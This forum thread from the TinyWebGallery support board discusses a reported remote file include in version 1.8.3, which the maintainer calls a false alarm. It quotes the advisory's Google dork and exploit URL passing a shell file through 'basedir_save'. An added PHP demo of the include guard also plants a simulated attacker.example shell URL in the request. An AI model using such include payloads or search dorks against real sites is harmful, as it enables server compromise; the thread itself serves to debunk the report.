Php photo gallery TWG | JFUploader | TWG Flash upload | WFU | Forum
https://www.tinywebgallery.com/forum/

TinyWebGallery v 1.8.3 Remote file include vulnerability
https://www.tinywebgallery.com/forum/viewtopic.php?f=5&t=2892

Author:  kmcjr3 [ 4. Feb 2011, 05:58 ]
Post subject:  TinyWebGallery v 1.8.3 Remote file include vulnerability

I began having trouble with an installation of TWG183. If I tried to make any configuration changes in the admin area, the gallery would stop working, with public messages that no albums existed. In fact, all graphics associated with TWG were no longer available, as if the installation path was incorrect. In the admin area everything looks fine.
The other thing that was happening was that a pop-under ad would be displayed when this occurred.

I figured I had been hacked somehow, so I deleted the installation and uploaded a new one. After entering the admin area I looked at the installation check info and found that session.save_path is suddenly "Not available" on my shared server (IXWebhosting). Now curious as to why this might be, I performed a search and found the following exploit post -

http://securityreason.com/expldownload/1/9885/1 (full post is below)

Now, I have known IXWebhosting to block exploited scripts without saying anything and perhaps that is what has happened here. They disabled session.save_path in the php.ini because of the exploit. I still have not heard back yet.

So is this a problem that needs to be fixed with TWG 183? If so, is there an update already?

Thank you
Ken



START CONTENTS OF POST
# Exploit Title: TinyWebGallery v 1.8.3 Remote file include vulnerability
# Google Dork: Photo Gallery powered by TinyWebGallery 1.8.3
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.tinywebgallery.com
# Version: v 1.8.3
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
File : i_basic.inc.php
http://localhost/[path]/i_frames/i_basic.inc.php

Code :
<?php
include '../config.php';

$basedir_save = $basedir;
?>

Exploit :
http://127.0.0.1/[path]/i_frames/i_basic.inc.php?basedir_save= [ Shell.txt ]

Enjoy :)

##########################################################
#
Greetz To : #
RoMaNcYxHaCkEr - saudi0hacker - aB0-3tH4b T3rR0r - TakEr #
#
##########################################################
END CONTENTS OF POST

Author:  TinyWebGallery [ 4. Feb 2011, 10:17 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerability

This is a false alarm
http://www.tinywebgallery.com/demo/i_fr ... ic.inc.php
cannot be called directly, as you can see

and
<?php
include '../config.php';

$basedir_save = $basedir;
?>

is not the code which is in this file!!!

it starts with

<?php
defined( '_VALID_TWG' ) or die( 'Direct Access to this location is not allowed.' );

and therefore cannot be used directly.

I have already contacted the website to remove this false alarm.

There is another exploit (http://securityreason.com/exploitalert/9911) which is already fixed in 1.8.4.
But this was only possible if you were logged in!! This exploit does NOT work without a logged in user!

Have you checked your log file for the attack? If not, you actually don't know what the problem was.

Best,
Michael
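The following is an added example written for this page, not code from TinyWebGallery or from either poster. It rebuilds the `defined('_VALID_TWG') or die(...)` guard Michael quotes in a throw-away directory and exercises it from the command line, so you can see both halves of the argument: a direct request to the include file stops at the guard, and when the file is reached through a legitimate entry point the value of `$basedir_save` is copied from `config.php`, so a `?basedir_save=...` parameter like the one in the quoted advisory never influences it. The file names mirror the thread; the file contents, the `index.php` entry point, the `PHP` nowdoc bodies and the path `/var/www/gallery/pictures/` are all constructed here and are not TinyWebGallery's real files.

```php
<?php
// Added example, not TinyWebGallery's own code. Reproduces the include
// guard quoted in the thread and shows that a query-string parameter cannot
// turn `$basedir_save = $basedir;` into a remote file include.
// File names mirror the thread; contents and paths are constructed here.
// Run with: php guard_demo.php

$root = sys_get_temp_dir() . '/twg_guard_' . getmypid();
mkdir("$root/i_frames", 0700, true);

// Constructed config: the gallery root is fixed by the administrator.
$config = <<<'PHP'
<?php
$basedir = '/var/www/gallery/pictures/';
PHP;

// The guarded include. Without _VALID_TWG the script dies on the guard line
// and nothing below it runs; with it, $basedir_save is copied from config.php,
// so a ?basedir_save=... value in the request is never consulted.
$guarded = <<<'PHP'
<?php
defined('_VALID_TWG') or die('Direct Access to this location is not allowed.');
include __DIR__ . '/../config.php';
$basedir_save = $basedir;
echo 'basedir_save=' . $basedir_save;
PHP;

// Legitimate entry point (assumed): defines the constant, simulates a hostile
// query string (the PHP CLI has no real $_GET), then pulls in the include.
$entry = <<<'PHP'
<?php
define('_VALID_TWG', true);
$_GET['basedir_save'] = 'http://attacker.example/shell.txt';
include __DIR__ . '/i_frames/i_basic.inc.php';
PHP;

file_put_contents("$root/config.php", $config);
file_put_contents("$root/i_frames/i_basic.inc.php", $guarded);
file_put_contents("$root/index.php", $entry);

// Each file runs in a fresh php process so a define() from one run cannot
// leak into the next (constants cannot be undefined in-process).
function run_php(string $file): string
{
    $cmd = escapeshellarg(PHP_BINARY) . ' ' . escapeshellarg($file) . ' 2>&1';
    return trim((string) shell_exec($cmd));
}

$direct = run_php("$root/i_frames/i_basic.inc.php"); // what the advisory's URL would hit
$viaApp = run_php("$root/index.php");                 // what the gallery itself does

printf("direct request : %s\n", $direct);
printf("via index.php  : %s\n", $viaApp);

// Clean up the throw-away tree.
foreach (["$root/i_frames/i_basic.inc.php", "$root/config.php", "$root/index.php"] as $f) {
    unlink($f);
}
rmdir("$root/i_frames");
rmdir($root);
```

Run from a shell with the PHP CLI on the path. The direct request line carries only the `die()` message, and the entry-point line shows the path set in `config.php` even though a hostile `basedir_save` was placed in `$_GET` first. The same two checks apply to any "RFI" advisory against a guarded include file: confirm the guard is the first statement, and confirm the named variable is assigned from a trusted source rather than from the request.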

Author:  kmcjr3 [ 4. Feb 2011, 16:04 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerability

Thanks - I will check further

Author:  kmcjr3 [ 4. Feb 2011, 17:45 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerability

What are the consequences to the photo gallery if session.save_path is not available?

Author:  TinyWebGallery [ 4. Feb 2011, 18:00 ]
Post subject:  Re: TinyWebGallery v 1.8.3 Remote file include vulnerability

You are not able to login and the caching does not work.

- Michael
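The following diagnostic is an added example, not part of TinyWebGallery and not something either poster ran. It checks what a "Not available" session.save_path actually means on a host: whether the configured directory exists and is writable, and whether PHP can really create a session file there, which is the condition behind the login and caching failures Michael describes. The function name, the `N;/path` handling and the probe key are assumptions for this example; nothing here is a statement about IXWebhosting's configuration.

```php
<?php
// Added diagnostic, not TinyWebGallery code. Run from the command line:
//   php session_check.php
// Reports the configured and effective session.save_path, whether it is
// writable, and whether a session file really appears there.
// The function name and probe key are assumptions made for this example.

function session_path_report(): array
{
    // '' means PHP falls back to the system temp directory.
    $configured = (string) ini_get('session.save_path');

    // Some hosts use the files-handler syntax "N;/path" or "N;MODE;/path";
    // the directory is always the last ';'-separated segment.
    $parts = explode(';', $configured);
    $last = trim((string) end($parts));
    $dir = $last !== '' ? $last : sys_get_temp_dir();

    $report = [
        'configured'    => $configured,
        'effective_dir' => $dir,
        'handler'       => (string) ini_get('session.save_handler'),
        'exists'        => is_dir($dir),
        'writable'      => is_dir($dir) && is_writable($dir),
        'session_ok'    => false,
    ];

    // Only the default 'files' handler writes sess_<id> into the directory;
    // for other handlers the directory check above is all we can say.
    if ($report['writable'] && $report['handler'] === 'files'
        && session_status() === PHP_SESSION_NONE) {
        @session_start();
        $_SESSION['twg_probe'] = time();   // assumed probe key
        $id = session_id();
        session_write_close();             // flushes the file to disk
        $file = "$dir/sess_$id";
        $report['session_ok'] = is_file($file);
        @unlink($file);
    }

    return $report;
}

foreach (session_path_report() as $key => $value) {
    printf("%-14s %s\n", $key, var_export($value, true));
}
```

If `exists` or `writable` is false, or `session_ok` stays false with the `files` handler, login will fail for exactly the reason given above: the session cookie is issued but nothing can be stored against it. In that situation the fix belongs in the hosting account's php.ini (or a `session_save_path()` call to a writable directory under your own web root), not in the gallery code.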
